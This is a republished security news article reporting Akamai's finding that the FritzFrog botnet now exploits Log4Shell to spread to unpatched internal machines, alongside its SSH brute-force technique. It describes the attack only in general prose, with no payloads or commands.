FritzFrog Botnet Exploits Log4Shell – Source:

Rate this post

Source: – Author: 1

Governance & Risk Management
Patch Management

Botnet Looks for Vulnerable Internal Network Machines

Prajeet Nair (@prajeetspeaks) •
February 2, 2024    

FritzFrog Botnet Exploits Log4Shell
Log4Shell strikes again. (Image: Shutterstock)

Delivering more proof that the Log4Shell vulnerability is endemic, Akamai researchers detected botnet malware updated to use the flaw as an infection vector, supplementing its usual remote login brute force technique.

See Also: Live Webinar | Securing the Cloud: Mitigating Vulnerabilities for Government

Akamai Security Intelligence Group observed the shift in the FritzFrog botnet, first documented in 2020.

Log4Shell, tracked as CVE-2021-44228, burst into public awareness in late 2021 when security researchers identified a flaw in the ubiquitous Apache Log4J 2 Java library. A panel of U.S. public and private sector security experts in mid-2022 warned that patching every vulnerable Log4j instance would likely take a decade “or longer” (see: Log4j Flaw Is ‘Endemic,’ Says Cyber Safety Review Board).

To spread their malware, FritzFrog operators exploit the fact that system administrators give lower priority to patching internal network machines. Internet-facing applications are an obvious priority for patching. But unpatched internal machines can still be a risk, the researchers said. FritzFrog looks for subnets and targets possible addresses within them.

“This means that even if the ‘high-profile’ internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation,” they said.

To trigger the Log4Shell vulnerability, FritzFrog forces an application to log data containing a malicious payload. The payload forces the Java application to connect to a server controlled by the attacker and download a malware binary.

Researchers in 2022 called FritzFrog a “new generation” of botnet for its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.

It still uses brute force techniques to infect SSH servers, Akamai said, but will now “also attempt to identify specific SSH targets by enumerating several system logs on each of its victims.”

Original Post url:

Category & Tags: –


advisor pick´S post